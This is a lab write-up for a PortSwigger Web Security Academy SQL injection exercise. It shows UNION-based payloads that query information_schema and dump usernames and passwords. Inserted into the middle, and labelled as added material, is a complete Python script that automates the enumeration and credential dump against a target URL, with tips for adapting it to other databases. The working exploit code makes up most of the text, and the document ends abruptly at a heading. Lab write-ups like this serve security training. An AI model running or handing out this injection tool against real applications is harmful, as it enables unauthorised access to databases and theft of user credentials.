PortSwigger: SQL injection attack, listing the database contents on non-Oracle databases

PortSwigger Web Security Academy: SQL injection 7

Hello World, and welcome to HaXeZ where today we’re looking at PortSwigger Web Security Academy: SQL injection 7. This lab requires you to query the information schema for the table name and its column names, then perform a UNION-based injection to retrieve the administrator’s username and password.

SQL injection attack, listing the database contents on non-Oracle databases

As mentioned above, this lab requires some thought about how to structure each query. First, you query the information schema to find out what tables exist. Then you query it again to find out which columns a particular table has. Finally, you modify the injection to select those columns from that table so it returns their contents.

The Lab

The Application

Navigating to the application, we can see it is laid out like the rest of the labs, with the navigation menu at the top and the list of products underneath. To capture a request, turn on Intercept in Burp Proxy (not Intruder) and click one of the product category links in the navigation; the filter request that Burp holds, with its category parameter, is the one we will inject into.


Querying The Database Tables

With the request captured, we can perform our standard column enumeration: add NULLs to a UNION SELECT until the query stops returning a server error, which gives the number of columns, then substitute a string for each NULL in turn to see which positions accept text. Once we have identified that there are two columns and that both contain text, we can query the ‘information_schema.tables‘ view so that it returns the names of all the tables in the database.

'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

Querying The Table Columns

Now that we know the names of the tables, we can pick out the interesting ones. Looking at the results we can see that there is a table called ‘users_odzpcz‘. This table will likely contain user credentials, but in order to proceed we need to know what columns it has. The query below asks ‘information_schema.columns‘ for the column names of that table.

'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_odzpcz'--

Querying The Column Data

Now that we have the column names, we can query the table directly and ask it to dump the contents of the two columns ‘password_nawvpk‘ and ‘username_bzubfy‘. I found that it was important to put the column names in the order that they appeared in the previous query. Otherwise, I just received a server error.

'+UNION+SELECT+password_nawvpk,+username_bzubfy+FROM+users_odzpcz--
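The three payloads above are the same every time a lab like this is reset; only the random suffixes on the table and column names change, so the whole walk can be scripted. The script below is an added example, not code from the HaXeZ write-up or from PortSwigger. It assumes a placeholder lab address (LAB_URL), that the injectable value is the category parameter of the /filter request, that the results page renders each row as a <tr> whose cells appear in the same order as the columns of the injected SELECT, and the lab’s users_*/username_*/password_* naming. The fetch function is passed in as a callable so the logic can be exercised offline against a constructed fake server.

```python
"""
Scripted version of the write-up's walk through information_schema:
count the columns, find the text ones, list tables, list columns, dump rows.
"""
import html
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

# ASSUMED: placeholder for your own lab instance; the injectable value is the
# category parameter of the /filter request.
LAB_URL = "https://YOUR-LAB-ID.web-security-academy.net/filter?category="
MARKER = "qXz7Wm"  # a string that will not occur in a real product listing


def union_select(n, exprs=None, from_clause=""):
    """Build the injected suffix: close the original string literal, UNION a
    SELECT of n columns (NULL except where exprs gives an expression for a
    position), and comment out the remainder of the original query."""
    exprs = exprs or {}
    cols = [exprs.get(i, "NULL") for i in range(n)]
    sql = "' UNION SELECT " + ", ".join(cols)
    if from_clause:
        sql += " FROM " + from_clause
    return sql + "--"


_ROW = re.compile(r"<tr(?:\s[^>]*)?>(.*?)</tr>", re.S)
_CELL = re.compile(r"<t[hd](?:\s[^>]*)?>(.*?)</t[hd]>", re.S)
_TAG = re.compile(r"<[^>]+>")


def table_rows(page):
    """ASSUMED layout: each result row is a <tr> whose <th>/<td> cells follow
    the column order of the injected SELECT. Returns a list of cell lists."""
    rows = []
    for row in _ROW.findall(page):
        cells = [html.unescape(_TAG.sub("", c)).strip() for c in _CELL.findall(row)]
        if cells:
            rows.append(cells)
    return rows


def http_fetch(payload, base=LAB_URL):
    """Send one payload; return (status, body). A 500 means the UNION was
    malformed: wrong column count or a type mismatch at some position."""
    url = base + urllib.parse.quote(payload, safe="")
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""


def find_column_count(fetch, max_cols=20):
    """Add NULLs until the UNION stops erroring."""
    for n in range(1, max_cols + 1):
        if fetch(union_select(n))[0] == 200:
            return n
    raise RuntimeError("no column count up to %d returned HTTP 200" % max_cols)


def find_text_columns(fetch, n):
    """Put a string in each position in turn; keep the positions that render it."""
    hits = []
    for i in range(n):
        status, page = fetch(union_select(n, {i: "'%s'" % MARKER}))
        if status == 200 and MARKER in page:
            hits.append(i)
    return hits


def attack(fetch, table_prefix="users", user_prefix="username", pass_prefix="password"):
    """Return {username: password} from the first table whose name starts with
    table_prefix. ASSUMED: the lab's users_xxxx / username_xxxx / password_xxxx naming."""
    n = find_column_count(fetch)
    text = find_text_columns(fetch, n)
    if len(text) < 2:
        raise RuntimeError("need two text columns to show two values per row")
    a, b = text[0], text[1]
    # Rows that the plain NULL UNION also returns are products, not our data.
    baseline = table_rows(fetch(union_select(n))[1])

    def injected(payload):
        return [r for r in table_rows(fetch(payload)[1]) if r not in baseline]

    rows = injected(union_select(n, {a: "table_name"}, "information_schema.tables"))
    tables = [r[a] for r in rows if len(r) > a and r[a].startswith(table_prefix)]
    if not tables:
        raise RuntimeError("no table starting with %r" % table_prefix)
    table = tables[0]
    rows = injected(union_select(n, {a: "column_name"},
                                 "information_schema.columns WHERE table_name='%s'" % table))
    cols = [r[a] for r in rows if len(r) > a]
    user_col = next(c for c in cols if c.startswith(user_prefix))
    pass_col = next(c for c in cols if c.startswith(pass_prefix))
    rows = injected(union_select(n, {a: user_col, b: pass_col}, table))
    return {r[a]: r[b] for r in rows if len(r) > max(a, b)}


if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else LAB_URL
    for user, pw in attack(lambda p: http_fetch(p, base)).items():
        print("%s : %s" % (user, pw))
```

Run it as `python3 dump_users.py 'https://YOUR-LAB-ID.web-security-academy.net/filter?category='` and it prints every username and password in the users table. Two points worth knowing when adapting it: SQL itself does not care in which order the column names appear in the final UNION relative to the information_schema listing; what has to line up is the column count and, position by position, the data type, so two text columns can be listed either way round. And if the original query only exposes one text column, the two values can be squeezed into it with string concatenation, `username_bzubfy||'~'||password_nawvpk` on PostgreSQL or `CONCAT(username_bzubfy,'~',password_nawvpk)` on MySQL, where `||` means logical OR by default.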

The SQL Injection

With the injection working, all we need to do is look through the returned rows and locate the administrator’s username and password. Once we have those, we can head to the login page, sign in with them, and the lab is solved.

The Login